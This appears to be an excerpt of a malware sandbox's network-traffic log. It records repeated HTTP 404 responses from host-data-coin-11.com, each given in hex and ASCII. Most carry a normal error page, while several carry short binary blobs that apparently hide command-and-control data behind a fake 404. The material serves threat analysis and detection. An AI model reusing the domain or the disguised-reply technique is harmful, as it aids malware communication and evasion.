Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a 